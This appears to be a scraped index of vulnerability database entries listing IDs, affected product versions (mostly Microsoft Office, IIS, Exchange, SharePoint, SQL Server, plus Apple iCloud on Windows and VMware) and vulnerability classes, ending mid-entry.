[94438] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 privilege escalation [94341] Apple iCloud up to 6.0 on Windows Windows Security Memory information disclosure [94340] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94339] Apple iCloud up to 6.0 on Windows WebKit information disclosure [94338] Apple iCloud up to 6.0 on Windows WebKit information disclosure [94337] Apple iCloud up to 6.0 on Windows WebKit Javascript unknown vulnerability [94336] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94335] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94334] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94333] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94332] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94331] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94330] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94329] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94328] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94327] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94326] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94325] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94324] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94323] Apple iCloud up to 6.0 on Windows WebKit State information disclosure [94322] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94321] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94320] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94319] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94318] Apple iCloud up to 6.0 on Windows WebKit memory corruption [93543] Microsoft SQL Server 2016 FILESTREAM Path information disclosure [93542] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 memory corruption [93541] Microsoft Office 2007 SP3 privilege escalation [93540] Microsoft Excel 2010 SP2/2011/2016 memory corruption [93539] Microsoft Office 2007/2010 SP2/2011 memory corruption [93538] Microsoft Office 2007/2010 SP2/2011/2013 SP1 memory corruption [93537] Microsoft Office 2007/2010 SP2/2011 information disclosure [93416] Microsoft SQL Server 2014 SP2/2016/up to 2012 SP3 Server Agent atxcore.dll privilege escalation [93415] Microsoft SQL Server 2016 MDS API cross site scripting [93414] Microsoft SQL Server up to 2012 SP3 RDBMS Engine privilege escalation [93413] Microsoft SQL Server 2016/up to 2014 SP2 RDBMS Engine privilege escalation [93412] Microsoft SQL Server 2016 RDBMS Engine privilege escalation [93396] Microsoft Office 2007/2010/2011 memory corruption [93395] Microsoft Office 2007/2010/2011 memory corruption [93394] Microsoft Office 2007/2010 memory corruption [93393] Microsoft Office up to 2016 memory corruption [93392] Microsoft Office up to 2016 memory corruption [93391] Microsoft Office up to 2016 memory corruption [93147] Apple iCloud up to 6.0 on Windows WebKit memory corruption [93146] Apple iCloud up to 6.0 on Windows WebKit User information disclosure [92584] Microsoft Office up to 2016 memory corruption [92249] Microsoft Azure Active Directory Passport up to 1.4.5/2.0.0 weak authentication [91703] Symantec Mail Security for Microsoft Exchange up to 6.5.8/7.0.4/7.5.4 RAR Decompression memory corruption [91702] Symantec Mail Security for Microsoft Exchange up to 6.5.8/7.0.4/7.5.4 RAR Decompression information disclosure [91614] VMware Workstation/Player on Windows JPEG2000 Image memory corruption [91613] VMware Workstation/Player on Windows TrueType Font memory corruption [91612] VMware Workstation/Player on Windows Cortado ThinPrint tpview.dll memory corruption [91611] VMware Workstation/Player on Windows Cortado ThinPrint memory corruption [91556] Microsoft Exchange 2016 Meeting Invation cross site scripting [91555] Microsoft Exchange 2013/2016 Link privilege escalation [91554] Microsoft Exchange 2007/2010/2013/2016 Email information disclosure [91553] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91552] Microsoft Office 2007/2010/2013/2013 RT/2016 privilege escalation [91551] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91550] Microsoft Office 2016 memory corruption [91549] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91548] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91547] Microsoft Office 2010 memory corruption [91546] Microsoft Office 2007/2010/2013/2013 RT memory corruption [91545] Microsoft Office 2007/2010 memory corruption [91544] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [91543] Microsoft Office up to 2016 memory corruption [91542] Microsoft Office 2007/2010/2013/2013 RT/2016 information disclosure [91541] Microsoft Office 2013/2016 APP-V 7PK Security Features [90706] Microsoft Office 2007/2010/2013/2013 RT Graphics memory corruption [90705] Microsoft Office 2007/2010/2011 memory corruption [90704] Microsoft Office 2013/2013 RT/2016 memory corruption [90703] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [90249] Microsoft Exchange Outlook Web Access privilege escalation [90169] Microsoft IIS PUT Request privilege escalation [89653] Microsoft IIS /cgi-bin/ Directory information disclosure [89597] Microsoft IIS 5.0 Download.Ject Trojan privilege escalation [89581] Microsoft ISA Server information disclosure [89568] Microsoft IIS ASP.NET information disclosure [89524] Microsoft ISA Server SSL Packet denial of service [89487] Microsoft Exchange information disclosure [89349] Microsoft IIS Passive FTP Connection information disclosure [89298] Microsoft SQL Server Version information disclosure [89286] Microsoft MSN Messenger IP Address information disclosure [89220] Microsoft IIS on WinNT4 IDC File Path information disclosure [89195] KpyM Windows Telnet Server privilege escalation [89179] Jordan Windows Telnet 1.0/1.2 memory corruption [89043] Microsoft Office up to 2016 memory corruption [89042] Microsoft Word Viewer memory corruption [89041] Microsoft Office up to 2016 memory corruption [89040] Microsoft Office 2010 SP2/2011/2013 RT SP1/2013 SP1/2016 memory corruption [89039] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [89038] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Security Feature 7PK Security Features [89037] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [88885] Microsoft Office 2000 SP1 Service Pack 2 privilege escalation [88829] Symantec Norton Antivirus on Windows Client IDS Driver memory corruption [88828] Symantec Endpoint Protection on Windows Client IDS Driver memory corruption [88761] Microsoft IIS privilege escalation [88654] Microsoft IIS 4.0 Remote Administration Script privilege escalation [88653] Microsoft Exchange 5.0/5.5 IMAP Service weak authentication [88616] Microsoft IIS privilege escalation [88583] Microsoft IIS 2.0/2.5 URLScan information disclosure [88289] Microsoft IIS Sample Files information disclosure [88260] Microsoft IIS bdir.htr information disclosure [88256] Microsoft SQL Server weak authentication [88254] Microsoft IIS 5.0 IDC File cross site scripting [88247] Microsoft IIS 5.0 Sample Application Form_JScript.asp cross site scripting [88243] Microsoft IIS /scripts/repost.asp File privilege escalation [88241] Microsoft IIS 5.0 Sample Application /iissamples Path information disclosure [88143] Microsoft Outlook S/MIME EmailAddress weak authentication [87956] Microsoft Exchange 2013/2016 Oracle Outside In Libraries information disclosure [87955] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87954] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87953] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87939] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 OLE DLL privilege escalation [87938] Microsoft Office 2007 SP3/2010 SP2/2011 information disclosure [87937] Microsoft Office 2007 SP3/2010 SP2/2011 memory corruption [87936] Microsoft Office up to 2016 privilege escalation [87626] VMware vCenter Server up to 5.1/5.5/6.0 on Windows cross site scripting [87541] VMware Workstation/Player on Windows privilege escalation [87168] Microsoft .NET Framework up to 4.6.1 TLS/SSL information disclosure [87149] Microsoft Office up to 2016 memory corruption [87148] Microsoft Office 2010 Graphics privilege escalation [87147] Microsoft Office 2007/2010 memory corruption [87146] Microsoft Office 2011/2013/2013 RT/2016 memory corruption [84364] Microsoft PowerPoint 2000/2002/2003 mso.dll memory corruption [84255] Microsoft Office privilege escalation [83849] Microsoft Office privilege escalation [82354] Microsoft IIS WebDAV denial of service [82229] Microsoft Excel 2010 SP2 Office Document memory corruption [82228] Microsoft Excel 2007 SP3/2010 SP2 Office Document memory corruption [82225] Microsoft Word 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [82224] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [81890] Microsoft IIS advsearch.asp denial of service [81889] Microsoft IIS query.asp denial of service [81888] Microsoft IIS search.asp denial of service [81769] Microsoft IIS 4.0/5.0 cmd.exe privilege escalation [81731] Microsoft IIS ASP.NET Path information disclosure [81558] Red Hat WildFly up to 10.0.0 on Windows Blacklist Filter File information disclosure [81274] Microsoft Office up to 2016 memory corruption [81273] Microsoft Office 2007/2010/2013/2016 privilege escalation [81272] Microsoft Office 2007/2010/2013 memory corruption [80886] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [80872] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80871] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80870] Microsoft Office up to 2016 memory corruption [80869] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80868] Microsoft Office up to 2016 memory corruption [80867] Microsoft Office up to 2016 memory corruption [80826] Oracle Java SE 6u111/7u95/8u71/8u72 on Windows Install privilege escalation [80733] cURL up to 7.46.x on Windows privilege escalation [80231] Microsoft Excel up to 2016 Office Document memory corruption [80229] Microsoft Exchange Server 2013 CU 10/2013 CU 11/2013 SP1/2016 Outlook Web Access cross site scripting [80228] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [80227] Microsoft Exchange Server 2013 CU 10/2013 SP1/2016 Outlook Web Access cross site scripting [80226] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [80218] Microsoft Office up to 2016 ASLR information disclosure [80217] Microsoft SharePoint Foundation 2013 SP1 Access Control Policy cross site scripting [80216] Microsoft Office up to 2016 Office Document memory corruption [80206] Microsoft SharePoint Foundation 2013 SP1 Access Control Policy cross site scripting [79863] Samba up to 4.3.2 Windows Active Directory Server privilege escalation [79745] Microsoft Office Font File memory corruption [79744] Microsoft Office Font File memory corruption [79743] Microsoft Office Font File memory corruption [79742] Microsoft Skype Font File memory corruption [79741] Microsoft Skype Font File memory corruption [79740] Microsoft Skype Font File memory corruption [79739] Microsoft .NET Framework up to 4.6 Font File memory corruption [79505] Microsoft Office 2007 memory corruption [79504] Microsoft Office 2007/2010/2013/2016 privilege escalation [79503] Microsoft Office 2007/2010/2013 memory corruption [79502] Microsoft Office 2007/2010/2011 memory corruption [79501] Microsoft Office 2007/2010 memory corruption [79500] Microsoft Office 2010/2011/2016 memory corruption [79190] Microsoft Word 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [79189] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [79187] Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Sandbox privilege escalation [79186] Microsoft Lync/Skype for Business cross site scripting [79181] Microsoft .NET Framework up to 4.6 ASLR information disclosure [79180] Microsoft .NET Framework up to 4.6 cross site scripting [79179] Microsoft .NET Framework up to 4.6 information disclosure [79177] Microsoft Office/SharePoint memory corruption [79176] Microsoft Office/SharePoint memory corruption [79175] Microsoft Office/SharePoint memory corruption [79117] Microsoft Outlook 2011/2016 on Mac HTML cross site scripting [78706] ownCloud Server up to 7.0.5/8.0.3 on Windows routing directory traversal [78375] Microsoft SharePoint Server/SharePoint Foundation 2013 SP1 cross site scripting [78374] Microsoft SharePoint Server/Office Web Apps cross site scripting [78373] Microsoft Excel/SharePoint Server fileVersion memory corruption [78371] Microsoft SharePoint Server 2007 SP3/2010 SP2 InfoPath Forms Services information disclosure [78370] Microsoft Excel/SharePoint Server Object calculatedColumnFormula memory corruption [77710] PHP up to 5.6.12 on Windows CLI Server memory corruption [77702] Corel WordPerfect Microsoft Word Document Conversion memory corruption [77646] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 EPS Image privilege escalation [77645] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting [77644] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting [77641] Microsoft Lync Server/Skype for Business Server cross site scripting [77638] Microsoft Lync Server 2013 cross site scripting [77637] Microsoft Lync Server/Skype for Business Server cross site scripting [77632] Microsoft .NET Framework up to 4.6 MVC Code [77629] Microsoft Excel 2007 SP3/2010 SP2/2011/2016 Office Document memory corruption [77628] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [77627] Microsoft Excel 2007 SP3/2010 SP2 Office Document memory corruption [77626] Microsoft Excel 2007 SP3/2010 SP2/2011/2016 Office Document memory corruption [77617] Microsoft Office 2007 SP3/2010 SP2 OpenType Font memory corruption [77612] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access information disclosure [77611] Microsoft .NET Framework up to 4.6 Array Copy memory corruption [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal [77252] Microsoft Office 2007 SP3/2010 SP2 Office Graphics Library Font privilege escalation [77053] Microsoft .NET Framework 4.6 RyuJIT Optimization privilege escalation [77052] Microsoft .NET Framework 4.6 RyuJIT Optimization privilege escalation [77051] Microsoft .NET Framework 4.6 RyuJIT Optimization privilege escalation [77050] Microsoft Office up to 2016 memory corruption [77049] Microsoft Office up to Word Viewer Numeric Error [77048] Microsoft Office up to Word Viewer memory corruption [77047] Microsoft Office up to Word Viewer memory corruption [77046] Microsoft Office up to Word Viewer memory corruption [77045] Microsoft Office up to Word Viewer privilege escalation [77044] Microsoft Office up to Word Viewer Command Line Parameter information disclosure [77043] Microsoft Office up to Word Viewer memory corruption [76497] Microsoft PowerPoint 2007 SP3/2010 SP2/2013 SP1 Office Document memory corruption [76491] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [76467] Microsoft Word 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76466] Microsoft Word 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76464] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [76463] Microsoft Excel 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76462] Microsoft Excel/SharePoint Server ASLR information disclosure [76440] Microsoft SQL Server 2008/2008 R2/2012/2014 Virtual Function privilege escalation [76439] Microsoft SQL Server 2008/2008 R2/2012/2014 privilege escalation [76438] Microsoft SQL Server 2008/2008 R2/2012/2014 Pointer Casting privilege escalation [76399] VMware Workstation/Player/Horizon View Client on Windows Discretionary Access Control List privilege escalation [75793] Microsoft Exchange Server 2013 CU8 cross site scripting [75792] Microsoft Exchange Server 2013 SP1 CU8 cross site request forgery [75791] Microsoft Office 2013 SP1 Office Document Data Processing Error [75787] Microsoft Exchange Server 2013 SP1 CU8 Same Origin Policy privilege escalation [75786] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1 Office Document Data Processing Error [75785] Microsoft Office Compatibility Pack SP3 Office Document Data Processing Error [75707] Cisco Unified MeetingPlace for Microsoft Outlook 8.6(1.2)/ 8.6(1.9) cross site scripting [75685] Skype on Windows/Android/iOS IM denial of service [75399] Trend Micro ScanMail for Microsoft Exchange up to 10.2/11.0 Session ID Generator weak encryption [75340] Microsoft .NET Framework up to 4.5.2 WinForms privilege escalation [75339] Microsoft .NET Framework up to 4.5.2 XML weak encryption [75338] Microsoft SharePoint 2007/2010/2013 Content privilege escalation [75337] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [75336] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [74848] Microsoft SharePoint Foundation/SharePoint Server 2013 SP1 cross site scripting [74846] Microsoft Word/Word Viewer/Office Compatibility Pack Document memory corruption [74845] Microsoft Office 2007/2010/2013 Document memory corruption [74844] Microsoft Office 2007/2010 Document memory corruption [74843] Microsoft .NET Framework up to 4.5.2 ASP.NET Data Processing Error [74837] Microsoft Office 2007/2010/2011/2013 RTF Document denial of service [74836] Microsoft Project Server 2010 SP2/2013 SP1 cross site scripting [74835] Microsoft Office 2011 on Mac cross site scripting [74393] Microsoft SharePoint Server 2013 Foundation cross site scripting [74016] Microsoft .NET Framework 4.03 PML File memory corruption [73979] Microsoft Exchange Server 2003 CU7/2003 SP1 Meeting privilege escalation [73978] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73977] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73976] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73975] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73967] Microsoft Office up to 2013 SP1 Office File Data Processing Error [73966] Microsoft Office up to 2013 SP1 RTF File denial of service [73965] Microsoft Office up to 2013 SP1 memory corruption [73964] Microsoft SharePoint 2007/2010/2013 cross site scripting [73200] Microsoft Exchange Server cross site scripting [73199] Microsoft Exchange Server cross site scripting [71337] Microsoft Office 2000/2004/XP privilege escalation [71152] clearhub Windows Live Hotmail PUSH mail 1.00.97 X.509 Certificate weak encryption [70617] Microsoft Outlook.com Certificates weak encryption [69467] Microsoft IIS 4.0/5.0/5.06/5.1 privilege escalation [69158] Microsoft Office 2007/2010/2013 memory corruption [69157] Microsoft Office 2007/2010/2013 OneTableDocumentStream denial of service [69156] Microsoft Office 2010 Object denial of service [69155] Microsoft Excel -/2007/2010/2013 Object denial of service [62914] Microsoft Office 2003 SP3/2007 SP3/2008/2010 SP1/2011 Spreadsheet denial of service [62238] Microsoft Visual Studio Team Foundation Server 2010 cross site scripting [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation [60711] Microsoft .NET Framework 4.0 denial of service [60205] Microsoft .NET Framework 2.0 SP2/3.5.1 privilege escalation [59908] Microsoft Anti-cross Site Scripting Library 3.1 cross site scripting [58992] Microsoft .NET Framework 1.0 SP3/1.1 SP1/2.0 SP2/3.5.1/4 privilege escalation [58492] Microsoft SharePoint Server 2007 Spreadsheet memory corruption [58491] Microsoft Office 2004/2007/2008/2010/2011 Spreadsheet privilege escalation [58490] Microsoft Office Compatibility Pack 2007 Spreadsheet memory corruption [58489] Microsoft Office 2004/2007/2008/2010/2011 Spreadsheet memory corruption [58488] Microsoft Office 2007/2010 privilege escalation [58487] Microsoft SharePoint Foundation 2010 cross site scripting [58486] Microsoft SharePoint Foundation 2010 Reflected cross site scripting [58485] Microsoft SharePoint Foundation 2010 EditForm.aspx cross site scripting [58239] Microsoft Visual Studio cross site scripting [57691] Microsoft SQL Server 2008 Web Service information disclosure [57690] Microsoft Excel 2002/2003 Spreadsheet memory corruption [57689] Microsoft Excel 2002 Spreadsheet memory corruption [57688] Microsoft Excel 2002 Spreadsheet memory corruption [57687] Microsoft Excel 2002/2003/2007 Spreadsheet memory corruption [57686] Microsoft Excel 2002 Spreadsheet memory corruption [57685] Microsoft Excel 2002/2003/2007 Array Access memory corruption [57684] Microsoft Excel 2002/2003/2007/2010 Spreadsheet memory corruption [57420] Microsoft PowerPoint 2002/2003 memory corruption [57410] Microsoft .NET Framework 3.5 SP1/3.5.1/4.0 Access Restriction privilege escalation [57278] Wireshark 1.4.0/1.4.1/1.4.2/1.4.3/1.4.4 on Windows NFS Dissector Numeric Error [57079] Microsoft PowerPoint 2002/2003/2007/2010 privilege escalation [57078] Microsoft Office 2003/2007/Xp docx unknown vulnerability [57077] Microsoft Excel 2002 memory corruption [57076] Microsoft Excel 2002/2003 memory corruption [57075] Microsoft Excel 2002/2003 memory corruption [57074] Microsoft Excel 2002 memory corruption [57073] Microsoft Excel 2002/2003/2007/2010 Numeric Error [57072] Microsoft Excel -/2002/2003/2007/2010 Numeric Error [56475] Microsoft Office 2004/2008 privilege escalation [56474] Microsoft Office Compatibility Pack Spreadsheet privilege escalation [56473] Microsoft Office Compatibility Pack memory corruption [55770] Microsoft Office Xp memory corruption [55769] Microsoft Office Xp memory corruption [55768] Microsoft Office Xp memory corruption [55767] Microsoft Office Xp memory corruption [55766] Microsoft Office Xp memory corruption [55765] Microsoft Office 2003/Xp Numeric Error [55764] Microsoft Office 2003/Xp memory corruption [55420] Microsoft Office 2007/2010 memory corruption [55419] Microsoft Office 2004/2008/2011/Xp memory corruption [55418] Microsoft Office up to Xp memory corruption [55417] Microsoft Office up to Xp memory corruption [55416] Microsoft Office up to Xp memory corruption [55412] Microsoft PowerPoint Viewer 2007 Numeric Error [55411] Microsoft PowerPoint 2002/2003 memory corruption [54995] Microsoft Office 2004/2008 privilege escalation [54994] Microsoft Office 2004/2008 privilege escalation [54993] Microsoft Office Compatibility Pack 2007 privilege escalation [54992] Microsoft Excel 2002 privilege escalation [54991] Microsoft Office 2004 Future privilege escalation [54990] Microsoft Office 2004 privilege escalation [54989] Microsoft Office 2004/2008 privilege escalation [54988] Microsoft Excel 2002 privilege escalation [54987] Microsoft Excel 2002 privilege escalation [54986] Microsoft Excel 2002/2003 privilege escalation [54985] Microsoft Office Compatibility Pack 2003/2004/2007/2008 privilege escalation [54984] Microsoft Office 2004/2008 privilege escalation [54983] Microsoft Excel 2002 Numeric Error [54980] Microsoft Word 2002/2003 privilege escalation [54979] Microsoft Word 2002 privilege escalation [54978] Microsoft Word 2002 privilege escalation [54977] Microsoft Word 2002 privilege escalation [54976] Microsoft Word 2002 denial of service [54975] Microsoft Word 2002 privilege escalation [54974] Microsoft Word 2002 privilege escalation [54973] Microsoft Word 2002 privilege escalation [54972] Microsoft Word 2002 privilege escalation [54971] Microsoft Word 2002 privilege escalation [54774] Microsoft Word 2003 word_crash_11.8326.8324_poc.doc denial of service [54757] Microsoft SharePoint Server 2007 HTML Sanitization SafeHTML cross site scripting [54719] Microsoft IIS 5.1 Access Restriction weak authentication [54617] Microsoft Outlook Web Access up to 2007 cross site request forgery [54550] Microsoft PowerPoint 2007 rpawinet.dll privilege escalation [54549] Microsoft PowerPoint 2010 pptimpconv.dll memory corruption [54322] Microsoft Word 2002/2003 privilege escalation [54321] Microsoft Office Compatibility Pack 2007 memory corruption [54320] Microsoft Office Compatibility Pack 2007 privilege escalation [54319] Microsoft Office Compatibility Pack 2007 privilege escalation [54318] Microsoft .NET Framework 2.0 SP1/2.0 SP2/3.5/3.5 SP1/3.5.1 Interfaces privilege escalation [54083] Microsoft Access 2003 ActiveX Control ACCWIZ.dll privilege escalation [53508] Microsoft SharePoint Services 3.0 denial of service [53507] Microsoft IIS 6.0/7.0/7.5 privilege escalation [53505] Microsoft Excel 2002/2007 privilege escalation [53504] Microsoft Excel 2002 privilege escalation [53503] Microsoft Excel 2002 privilege escalation [53502] Microsoft Excel 2002 privilege escalation [53501] Microsoft Excel 2002 privilege escalation [53500] Microsoft Excel 2002 privilege escalation [53499] Microsoft Excel 2002 privilege escalation [53498] Microsoft Excel 2002 privilege escalation [53497] Microsoft Excel 2002 privilege escalation [53496] Microsoft Excel 2002 privilege escalation [53495] Microsoft Excel 2002/2003/2007 privilege escalation [53494] Microsoft Excel 2002 privilege escalation [53493] Microsoft Excel 2002/2003/2007 privilege escalation [53385] Microsoft Exchange Server 2007 Outlook Web Access cross site scripting [53367] Microsoft .NET Framework 1.0 Default Configuration cross site scripting [53164] Microsoft Office 2003/2007/Xp ActiveX Control VBE6.DLL privilege escalation [52430] Microsoft Wireless Keyboard Encryption XOR weak encryption [52148] Microsoft Office 2004/2007/2008 privilege escalation [52147] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52146] Microsoft Office 2004/2007/2008 Spreadsheet memory corruption [52145] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52144] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52143] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [51995] Microsoft SharePoint Server up to 2006 cross site scripting [51810] Microsoft Office 2004/Xp MSO.DLL memory corruption [51802] Microsoft PowerPoint 2003 memory corruption [51801] Microsoft PowerPoint 2003 memory corruption [51800] Microsoft PowerPoint 2002/2003 privilege escalation [51799] Microsoft PowerPoint 2002/2003 privilege escalation [51798] Microsoft PowerPoint 2002/2003 memory corruption [51758] Microsoft IIS 6.0 cross site scripting [51338] Microsoft IIS up to 6.0 asp:.jpg privilege escalation [51074] Microsoft Office 2002/2003 Numeric Error [50812] Citrix Online Plug-in up to 11.0 on Windows weak encryption [50794] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50793] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50792] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50791] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50790] Microsoft Office 2004/2008 Spreadsheet memory corruption [50789] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50788] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50787] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50660] Microsoft SharePoint Server 2007 privilege escalation [50443] Microsoft PowerPoint 2007 Numeric Error [50437] Microsoft .NET Framework 1.1 SP1/2.0 SP2 GDI+ Numeric Error [50432] Microsoft .NET Framework 2.0/2.0 SP1/2.0 SP2/3.5/3.5 SP1 privilege escalation [50155] PHP on Windows C Runtime _fdopen Format String [50139] Microsoft Enterprise Library 4.0 Format String [49699] Sophos PureMessage for Microsoft Exchange Installation denial of service [49698] Sophos PureMessage for Microsoft Exchange EdgeTransport.exe denial of service [49697] Sophos PureMessage for Microsoft Exchange Message Queue PMScanner.exe denial of service [49395] Microsoft Office 2000/2003/XP Office Web Components memory corruption [49390] Microsoft Office 2000/2003/XP Office Web Components memory corruption [49389] Microsoft Office 2000/2003/XP Office Web Components denial of service [49272] XEmacs 21.4.22 on Windows glyphs-eimage.c jpeg_instantiate Numeric Error [49198] Microsoft Visual Studio 2005 information disclosure [49191] Microsoft Visual Studio Error privilege escalation [49044] Microsoft ISA Server 2006 privilege escalation [48572] Microsoft PowerPoint 2002 FL21WIN.DLL privilege escalation [48554] Microsoft Excel 2000/2003/2007 privilege escalation [48549] Microsoft IIS 5.0 weak authentication [48548] Microsoft Office up to Xp Numeric Error [48547] Microsoft Office up to Xp denial of service [48546] Microsoft Office up to Xp privilege escalation [48545] Microsoft Office up to Xp privilege escalation [48544] Microsoft Office up to Xp privilege escalation [48543] Microsoft Office up to Xp privilege escalation [48518] Microsoft ADAM XP Active Directory denial of service [48515] Microsoft Office Word Viewer 2003 memory corruption [48514] Microsoft Office Word Viewer 2003 memory corruption [48498] Microsoft IIS 5.0/5.1/6.0 Password Protection weak authentication [48409] IBM DB2 8.0/9.1/9.5 on Windows Configuration [48157] Microsoft PowerPoint 2002 Sound memory corruption [48156] Microsoft PowerPoint 2000 memory corruption [48155] Microsoft PowerPoint 2002 Notes Container memory corruption [48154] Microsoft PowerPoint 2002 Sound PP7X32.DLL memory corruption [48153] Microsoft PowerPoint 2002 Sound privilege escalation [48152] Microsoft PowerPoint 2002 PP4X32.DLL memory corruption [48151] Microsoft PowerPoint 2002 memory corruption [48150] Microsoft PowerPoint 2002 Sound privilege escalation [48149] Microsoft PowerPoint 2002 privilege escalation [48148] Microsoft PowerPoint 2002 Sound privilege escalation [48147] Microsoft PowerPoint 2002 Sound privilege escalation [48146] Microsoft PowerPoint 2002 Numeric Error [47718] Microsoft Excel 2000/2002/2003/2007 Spreadsheet denial of service [47716] Microsoft Office Converter Pack 2003 WPFT632.CNV privilege escalation [46594] Trend Micro InterScan Web Security Virtual Appliance 3.1 Windows Media Player information disclosure [46455] Microsoft Exchange Server 2007 privilege escalation [46454] Microsoft Exchange Server 2007 denial of service [46343] F-Secure Anti-Virus up to 8.00 on Windows Numeric Error [46327] Microsoft Word 2007 information disclosure [45388] CA ARCserve Backup up to R12.0 on Windows memory corruption [45379] Microsoft Office SharePoint Server 2007 weak authentication [45375] Symantec Backup Exec 12.0 on Windows memory corruption [45374] Symantec Backup Exec 12.0 on Windows weak authentication [45131] Microsoft Office Communicator denial of service [45130] Microsoft Office Communicator denial of service [45040] Microsoft .NET Framework 2.0.50727 Code Access Security weak encryption [44970] Novell eDirectory up to 8.8 on Windows denial of service [44958] Microsoft SharePoint Server cross site scripting [44855] DjVu Activex Control For Microsoft Office 2000 3.0 ActiveX Control DjVu_ActiveX_MSOffice.dll memory corruption [44665] Microsoft Peachtree Accounting 2004 ActiveX Control PAWWeb11.ocx unknown vulnerability [44589] Microsoft Exchange Server 2003 Outlook Web Access directory traversal [44238] Microsoft iis ActiveX Control iisext.dll privilege escalation [44237] Microsoft iis ActiveX Control adsiis.dll privilege escalation [44047] Microsoft SQL Server 2000 ActiveX Control SQLVDIRLib.SQLVDirControl memory corruption [43957] Microsoft Office 2003/2007/Xp gdiplus.dll Numeric Error [43956] Microsoft Office 2003/2007/Xp gdiplus.dll memory corruption [43955] Microsoft Office 2003/2007/Xp gdiplus.dll denial of service [43952] Microsoft Office 2003/2007/Xp URI privilege escalation [43822] Microsoft .NET Framework 1.1 Request Validation cross site scripting [43821] Microsoft .NET Framework 1.1 Request Validation cross site scripting [43723] Microsoft Visual Studio Masked Edit Control Msmask32.ocx memory corruption [43662] Microsoft PowerPoint Viewer 2000 SP3/2002 SP3/2003 SP2/2007 SP1 denial of service [43661] Microsoft PowerPoint Viewer 2003 denial of service [43660] Microsoft PowerPoint Viewer 2003 denial of service [43657] Microsoft Office 2000/2003/Xp denial of service [43654] Microsoft SharePoint Server 2007 denial of service [43653] Microsoft Office 2000/2002/2004/2008 privilege escalation [43652] Microsoft Office 2000/2002/2003/2004/2008 privilege escalation [43103] Microsoft Exchange Srv 2007 Sp1 Outlook Web 